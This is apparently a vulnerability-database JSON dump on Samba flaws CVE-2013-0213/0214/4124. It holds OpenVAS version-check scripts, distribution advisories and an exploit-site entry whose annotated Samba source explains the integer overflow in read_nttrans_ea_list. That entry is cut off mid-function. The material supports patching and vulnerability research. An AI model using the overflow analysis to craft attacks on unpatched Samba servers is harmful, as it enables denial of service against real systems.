License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.881903\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 09:46:01 +0530 (Thu, 20 Mar 2014)\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for libsmbclient CESA-2014:0305 centos5\");\n\n script_tag(name:\"affected\", value:\"libsmbclient on CentOS 5\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the smb service will be restarted automatically.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"CESA\", value:\"2014:0305\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-March/020204.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libsmbclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2013-4124"], "description": "Check for the Version of libsmbclient", "modified": "2017-07-10T00:00:00", "published": "2014-03-20T00:00:00", "id": "OPENVAS:881903", "href": "http://plugins.openvas.org/nasl.php?oid=881903", "type": "openvas", "title": "CentOS Update for libsmbclient CESA-2014:0305 centos5 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for libsmbclient CESA-2014:0305 centos5 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(881903);\n script_version(\"$Revision: 6656 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:49:38 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-03-20 09:46:01 +0530 (Thu, 20 Mar 2014)\");\n script_cve_id(\"CVE-2013-0213\", \"CVE-2013-0214\", \"CVE-2013-4124\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"CentOS Update for libsmbclient CESA-2014:0305 centos5 \");\n\n tag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\nCommon Internet File System (CIFS) protocol, which allows PC-compatible\nmachines to share files, printers, and other information.\n\nIt was discovered that the Samba Web Administration Tool (SWAT) did not\nprotect against being opened in a web page frame. A remote attacker could\npossibly use this flaw to conduct a clickjacking attack against SWAT users\nor users with an active SWAT session. (CVE-2013-0213)\n\nA flaw was found in the Cross-Site Request Forgery (CSRF) protection\nmechanism implemented in SWAT. An attacker with the knowledge of a victim's\npassword could use this flaw to bypass CSRF protections and conduct a CSRF\nattack against the victim SWAT user. (CVE-2013-0214)\n\nAn integer overflow flaw was found in the way Samba handled an Extended\nAttribute (EA) list provided by a client. A malicious client could send a\nspecially crafted EA list that triggered an overflow, causing the server to\nloop and reprocess the list using an excessive amount of memory.\n(CVE-2013-4124)\n\nNote: This issue did not affect the default configuration of the Samba\nserver.\n\nRed Hat would like to thank the Samba project for reporting CVE-2013-0213\nand CVE-2013-0214. Upstream acknowledges Jann Horn as the original reporter\nof CVE-2013-0213 and CVE-2013-0214.\n\nAll users of Samba are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing this\nupdate, the smb service will be restarted automatically.\n\";\n\n tag_affected = \"libsmbclient on CentOS 5\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"CESA\", value: \"2014:0305\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2014-March/020204.html\");\n script_summary(\"Check for the Version of libsmbclient\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.40.el5_10\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "cvelist": ["CVE-2013-4124"], "description": "\r\n\r\nHi Forks!\r\n\r\nIt's my samba private exploit and article \r\nof it. the security bug occurs while nttrans\r\nreply in samba daemon source code tree.\r\n\r\nthe remote dos exploit that i copied from\r\nanother nttrans exploit in 2003. and can't\r\ntest it yet, check it out! \r\n\r\nCVE-2013-4124 samba dos private exploit: \r\n- http://www.x90c.org/exploits/samba_nttr\r\n ans_exploit.c\r\n\r\n.. and I left an article about the bug with an analyze\r\n\r\nsamba nttrans reply integer overflow:\r\n- http://www.x90c.org/articles/samba_nttran\r\n s_reply_integer_overflow.txt\r\n\r\n\r\nx90c\r\n", "edition": 1, "modified": "2013-08-28T00:00:00", "published": "2013-08-28T00:00:00", "id": "SECURITYVULNS:DOC:29727", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29727", "title": "CVE-2013-4124 samba nttrans dos private exploit", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0172", "CVE-2013-0213", "CVE-2013-0214", "CVE-2013-4124"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2013-08-15T02:50:09", "published": "2013-08-15T02:50:09", "id": "FEDORA:18D6B2296A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: samba-4.0.8-1.fc18", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0172", "CVE-2013-0213", "CVE-2013-0214", "CVE-2013-4124", "CVE-2013-4475"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2013-11-23T19:45:33", "published": "2013-11-23T19:45:33", "id": "FEDORA:A0D702183C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: samba-4.0.11-1.fc18", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0213", "CVE-2013-0214"], "description": " Samba is the suite of programs by which a lot of PC-related machines share files, printers, and other information (such as lists of available files and printers). The Windows NT, OS/2, and Linux operating systems support this natively, and add-on packages can enable the same thing for DOS, Windows, VMS, UNIX of all kinds, MVS, and more. This package provides an SMB/CIFS server that can be used to provide network services to SMB/CIFS clients. Samba uses NetBIOS over TCP/IP (NetBT) protocols and does NOT need the NetBEUI (Microsoft Raw NetBIOS frame) protocol. ", "modified": "2013-02-12T05:30:46", "published": "2013-02-12T05:30:46", "id": "FEDORA:CAF3520AEF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: samba-3.6.12-1.fc17.1", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0172", "CVE-2013-0213", "CVE-2013-0214"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2013-02-12T05:06:25", "published": "2013-02-12T05:06:25", "id": "FEDORA:6B41920ABC", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 18 Update: samba-4.0.2-1.fc18", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0172", "CVE-2013-0213", "CVE-2013-0214"], "description": "Samba is the standard Windows interoperability suite of programs for Linux and Unix. ", "modified": "2013-02-12T05:11:58", "published": "2013-02-12T05:11:58", "id": "FEDORA:996EA20BEE", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 17 Update: samba4-4.0.0-60alpha18.fc17", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0817", "CVE-2012-1182", "CVE-2012-2111", "CVE-2013-0213", "CVE-2013-0214"], "description": " Samba is the suite of programs by which a lot of PC-related machines share files, printers, and other information (such as lists of available files and printers). The Windows NT, OS/2, and Linux operating systems support this natively, and add-on packages can enable the same thing for DOS, Windows, VMS, UNIX of all kinds, MVS, and more. This package provides an SMB/CIFS server that can be used to provide network services to SMB/CIFS clients. Samba uses NetBIOS over TCP/IP (NetBT) protocols and does NOT need the NetBEUI (Microsoft Raw NetBIOS frame) protocol. ", "modified": "2013-02-12T05:03:06", "published": "2013-02-12T05:03:06", "id": "FEDORA:095C220955", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 16 Update: samba-3.6.12-1.fc16", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:41:15", "description": "BUGTRAQ ID: 61597\r\nCVE(CAN) ID: CVE-2013-4124\r\n\r\nSamba\u662f\u4e00\u5957\u5b9e\u73b0SMB\uff08Server Messages Block\uff09\u534f\u8bae\u3001\u8de8\u5e73\u53f0\u8fdb\u884c\u6587\u4ef6\u5171\u4eab\u548c\u6253\u5370\u5171\u4eab\u670d\u52a1\u7684\u7a0b\u5e8f\u3002\r\n\r\nSamba 3.0.0-4.0.7\u5728\u5df2\u9a8c\u8bc1\u6216\u5ba2\u6237\u7aef\u8fde\u63a5\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e\uff0c\u6076\u610f\u62a5\u6587\u53ef\u9020\u6210smbd\u670d\u52a1\u5668CPU\u5faa\u73af\u6267\u884c\u5185\u5b58\u5206\u914d\uff0c\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002\u8981\u5229\u7528\u6b64\u6f0f\u6d1e\u9700\u8981\u4e00\u4e2a\u6587\u4ef6\u5171\u4eab\u8fde\u63a5\u6216\u672c\u5730\u8d26\u6237\u3002\r\n0\r\nSamba 4.x\r\nSamba 3.x\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nSamba\r\n-----\r\nSamba\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08CVE-2013-4124\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\nCVE-2013-4124\uff1aDenial of service - CPU loop and memory allocation.\r\n\u94fe\u63a5\uff1ahttp://www.samba.org/samba/security/CVE-2013-4124\r\n\r\n\u8865\u4e01\u4e0b\u8f7d\uff1ahttp://www.samba.org/samba/security/", "published": "2013-08-11T00:00:00", "title": "Samba \u672c\u5730\u62d2\u7edd\u670d\u52a1\u6f0f\u6d1e(CVE-2013-4124)", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-4124"], "modified": "2013-08-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-60939", "id": "SSV:60939", "sourceData": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": ""}], "suse": [{"lastseen": "2016-09-04T11:18:44", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0214", "CVE-2013-0213"], "description": "The Samba Web Administration Tool (SWAT) in Samba versions\n 3.0.x to 4.0.1 was affected by a cross-site request\n forgery (CVE-2013-0214) and a click-jacking attack\n (CVE-2013-0213). This has been fixed.\n", "edition": 1, "modified": "2013-02-22T17:04:27", "published": "2013-02-22T17:04:27", "id": "SUSE-SU-2013:0326-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-02/msg00019.html", "title": "Security update for Samba (important)", "type": "suse", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:57:00", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0214", "CVE-2013-0213"], "description": "The Samba Web Administration Tool (SWAT) in Samba versions\n 3.0.x to 4.0.1 was affected by a cross-site request\n forgery; CVE-2013-0214; (bnc#799641).\n\n The Samba Web Administration Tool (SWAT) in Samba versions\n 3.0.x to 4.0.1 could possibly be used in clickjacking\n attacks; CVE-2013-0213; (bnc#800982).\n\n Also the following bugs have been fixed:\n\n * Don't clutter the spec file diff view; (bnc#783384).\n * s3: Fix uninitialized memory read in talloc_free();\n (bnc#764577).\n * Attempt to use samlogon validation level 6;\n (bso#7945); (bnc#741623).\n * Add PreReq /etc/init.d/nscd to the winbind package;\n (bnc#759731).\n * Recover from ncacn_ip_tcp ACCESS_DENIED/SEC_PKG_ERROR\n lsa errors; (bso#7944); (bnc#755663).\n * Fix lsa_LookupSids3 and lsa_LookupNames4 arguments.\n", "edition": 1, "modified": "2013-03-22T15:04:30", "published": "2013-03-22T15:04:30", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00042.html", "id": "SUSE-SU-2013:0519-1", "title": "Security update for Samba (important)", "type": "suse", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:51:43", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0214", "CVE-2013-0213", "CVE-2012-1586"], "description": "The Samba Web Administration Tool (SWAT) in Samba versions\n 3.0.x to 4.0.1 was affected by a cross-site request\n forgery (CVE-2013-0214) and a click-jacking attack\n (CVE-2013-0213). This has been fixed.\n\n Additionally a bug in mount.cifs has been fixed which could\n have lead to file disclosure (CVE-2012-1586).\n\n Also a uninitialized memory read bug in talloc_free() has\n been fixed. (bnc#764577).\n", "edition": 1, "modified": "2013-02-22T16:04:20", "published": "2013-02-22T16:04:20", "id": "SUSE-SU-2013:0325-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-02/msg00018.html", "type": "suse", "title": "Security update for Samba (important)", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T12:21:19", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4124"], "description": "This update of samba fixed the following issues:\n\n - The pam_winbind require_membership_of option allows for a\n list of SID, but currently only provides buffer space for\n ~20; (bnc#806501).\n\n - Samba 3.0.x to 4.0.7 are affected by a denial of service\n attack on authenticated or guest connections;\n CVE-2013-4124; (bnc#829969).\n\n - PIDL: fix parsing linemarkers in preprocessor output;\n (bso#9636).\n - build:autoconf: fix output of syslog-facility check;\n (bso#9983).\n - libreplace: add a missing "eval" to the\n AC_VERIFY_C_PROTOTYPE macro.\n\n - Remove ldapsmb from the main spec file.\n\n - Don't bzip2 the main tar ball, use the upstream gziped\n one instead.\n\n - Fix crash bug during Win8 sync; (bso#9822).\n - Check for system libtevent and link dbwrap_tool and\n dbwrap_torture against it; (bso#9881).\n - errno gets overwritten in call to check_parent_exists();\n (bso#9927).\n - Fix a bug of drvupgrade of smbcontrol; (bso#9941).\n\n - Document idmap_ad rfc2307 attribute requirements;\n (bso#9880); (bnc#820531).\n\n - Don't package the SWAT man page while its build is\n disabled; (bnc#816647).\n\n - Don't install the tdb utilities man pages on post-12.1\n systems; (bnc#823549).\n\n - Fix libreplace license ambiguity; (bso#8997);\n (bnc#765270).\n\n - s3-docs: Remove "experimental" label on "max\n protocol=SMB2" parameter; (bso#9688).\n - Remove the compound_related_in_progress state from the\n smb2 global state; (bso#9722).\n - Makefile: Don't know how to make LIBNDR_PREG_OBJ;\n (bso#9868).\n\n - Fix is_printer_published GUID retrieval; (bso#9900);\n (bnc#798856).\n\n - Fix 'map untrusted to domain' with NTLMv2; (bso#9817);\n (bnc#817919).\n - Don't modify the pidfile name when a custom config file\n path is used; (bnc#812929).\n\n - Add extra attributes for AD printer publishing;\n (bso#9378); (bnc#798856).\n - Fix vfs_catia module; (bso#9701); (bnc#824833). systems;\n (bnc#804822); (bnc#821889).\n\n - Fix AD printer publishing; (bso#9378); (bnc#798856).\n\n", "edition": 1, "modified": "2013-08-16T15:04:40", "published": "2013-08-16T15:04:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00015.html", "id": "OPENSUSE-SU-2013:1349-1", "title": "update for samba (important)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "debian": [{"lastseen": "2020-11-11T13:23:47", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0214", "CVE-2013-0213"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2617-1 security@debian.org\nhttp://www.debian.org/security/ Luciano Bello\nFebruary 02, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : samba\nVulnerability : several issues\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-0213 CVE-2013-0214\n\nJann Horn had reported two vulnerabilities in Samba, a popular\ncross-platform network file and printer sharing suite. In particular,\nthese vulnerabilities affect to SWAT, the Samba Web Administration Tool.\n\nCVE-2013-0213: Clickjacking issue in SWAT\n An attacker can integrate a SWAT page into a malicious web page via a\n frame or iframe and then overlaid by other content. If an \n authenticated valid user interacts with this malicious web page, she \n might perform unintended changes in the Samba settings.\n\nCVE-2013-0214: Potential Cross-site request forgery\n An attacker can persuade a valid SWAT user, who is logged in, to\n click in a malicious link and trigger arbitrary unintended changes in\n the Samba settings.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion 3.5.6~dfsg-3squeeze9.\n\nFor the testing distribution (wheezy), these problems have been fixed in\nversion 2:3.6.6-5.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:3.6.6-5.\n\nWe recommend that you upgrade your samba packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 7, "modified": "2013-02-02T12:33:25", "published": "2013-02-02T12:33:25", "id": "DEBIAN:DSA-2617-1:6509D", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00020.html", "title": "[SECURITY] [DSA 2617-1] samba security update", "type": "debian", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:42:38", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7560", "CVE-2013-0214", "CVE-2013-0213", "CVE-2016-0771"], "description": "Jeremy Allison discovered that Samba incorrectly handled ACLs on symlink \npaths. A remote attacker could use this issue to overwrite the ownership of \nACLs using symlinks. (CVE-2015-7560)\n\nGarming Sam and Douglas Bagnall discovered that the Samba internal DNS \nserver incorrectly handled certain DNS TXT records. A remote attacker could \nuse this issue to cause Samba to crash, resulting in a denial of service, \nor possibly obtain uninitialized memory contents. This issue only applied \nto Ubuntu 14.04 LTS and Ubuntu 15.10. (CVE-2016-0771)\n\nIt was discovered that the Samba Web Administration Tool (SWAT) was \nvulnerable to clickjacking and cross-site request forgery attacks. This \nissue only affected Ubuntu 12.04 LTS. (CVE-2013-0213, CVE-2013-0214)", "edition": 5, "modified": "2016-03-08T00:00:00", "published": "2016-03-08T00:00:00", "id": "USN-2922-1", "href": "https://ubuntu.com/security/notices/USN-2922-1", "title": "Samba vulnerabilities", "type": "ubuntu", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "samba": [{"lastseen": "2020-12-24T13:21:00", "bulletinFamily": "software", "cvelist": ["CVE-2013-0214"], "description": "All current released versions of Samba are vulnerable to a cross-site request forgery in the Samba Web Administration Tool (SWAT). By guessing a user's password and then tricking a user who is authenticated with SWAT into clicking a manipulated URL on a different web page, it is possible to manipulate SWAT.\nIn order to be vulnerable, the attacker needs to know the victim's password. Additionally SWAT must have been installed and enabled either as a standalone server launched from inetd or xinetd, or as a CGI plugin to Apache. If SWAT has not been installed or enabled (which is the default install state for Samba) this advisory can be ignored.\nIf the user authenticated to SWAT as root AND the attacker knows the user's root password, it is possible to shut down or start the samba daemons, add or remove shares, printers and user accounts and to change other aspects of the Samba configuration.\nThe Samba Team considers that if the attacker knows the root password, that security has already been breached, but is patching this issue in 4.0.2 out of an abundance of caution, as we are already patching another SWAT issue with this release.", "edition": 5, "modified": "2013-01-30T00:00:00", "published": "2013-01-30T00:00:00", "id": "SAMBA:CVE-2013-0214", "href": "https://www.samba.org/samba/security/CVE-2013-0214.html", "title": "Cross-Site Request Forgery in SWAT ", "type": "samba", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-01-06T09:10:59", "edition": 2, "description": "vulnerable samba daemon has a integer overflow \rto cause remote dos by nttrans reply while the \rdaemon reading ea_list. In the detail, unsigned\rdata type offset variable in vulnerable function \rof read_nttrans_ea_list can be wrap up! security\rbug!", "published": "2013-08-22T00:00:00", "type": "zdt", "title": "Samba nttrans Reply - Integer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-4124"], "modified": "2013-08-22T00:00:00", "id": "1337DAY-ID-21146", "href": "https://0day.today/exploit/description/21146", "sourceData": "[security bug analyze]\r\nsmbd/nttrans.c\r\n---- snip ---- snip ---- snip ---- snip ----\r\n971 /****************************************************************************\r\n 972 Read a list of EA names and data from an incoming data buffer. Create an ea_list with them.\r\n 973 ****************************************************************************/\r\n 974 EA names, data from samba incoming buffer!\r\n 975 struct ea_list *read_nttrans_ea_list(TALLOC_CTX *ctx, const char *pdata, size_t data_size) // *pdata is inject vector\r\n 976 {\r\n 977 struct ea_list *ea_list_head = NULL;\r\n 978 size_t offset = 0; // unisigned\r\n 979 \r\n 980 if (data_size < 4) {\r\n 981 return NULL;\r\n 982 }\r\n 983 \r\n 984 while (offset + 4 <= data_size) { // XXX (3) if offset is wrap up then it enters the loop continuly\r\n 985 size_t next_offset = IVAL(pdata,offset); // unsigned XXX (1) if next_offset from pdata pointer is much large value then to lead integer wrap!\r\n// XXX (4) may memory corruption point! if offset is wrap up then second argv pointer(pdata+offset+4) pointers around zero memory then smb dos! \r\n 986 struct ea_list *eal = read_ea_list_entry(ctx, pdata + offset + 4, data_size - offset - 4, NULL);\r\n 987 \r\n 988 if (!eal) {\r\n 989 return NULL;\r\n 990 }\r\n 991 \r\n 992 DLIST_ADD_END(ea_list_head, eal, struct ea_list *);\r\n 993 if (next_offset == 0) {\r\n 994 break;\r\n 995 }\r\n 996 \r\n 997 /* Integer wrap protection for the increment. */ // XXX patch code\r\n 998 if (offset + next_offset < offset) {\r\n 999 break;\r\n1000 }\r\n1001 \r\n1002 offset += next_offset; // XXX (2) if next_offset is large value then offset is wrap!\r\n1003 \r\n1004 /* Integer wrap protection for while loop. */ // XXX patch code\r\n1005 if (offset + 4 < offset) {\r\n1006 break;\r\n1007 }\r\n1008 \r\n1009 }\r\n1010 \r\n1011 return ea_list_head;\r\n1012 }\r\n---- snip ---- snip ---- snip ---- snip ----\r\n \r\n---- snip ---- snip ---- snip ---- snip ----\r\n1014 /****************************************************************************\r\n1015 Reply to a NT_TRANSACT_CREATE call (needs to process SD's).\r\n1016 ****************************************************************************/\r\n1017 \r\n1018 static void call_nt_transact_create(connection_struct *conn,\r\n1019 struct smb_request *req,\r\n1020 uint16 **ppsetup, uint32 setup_count,\r\n1021 char **ppparams, uint32 parameter_count,\r\n1022 char **ppdata, uint32 data_count,\r\n1023 uint32 max_data_count)\r\n1024 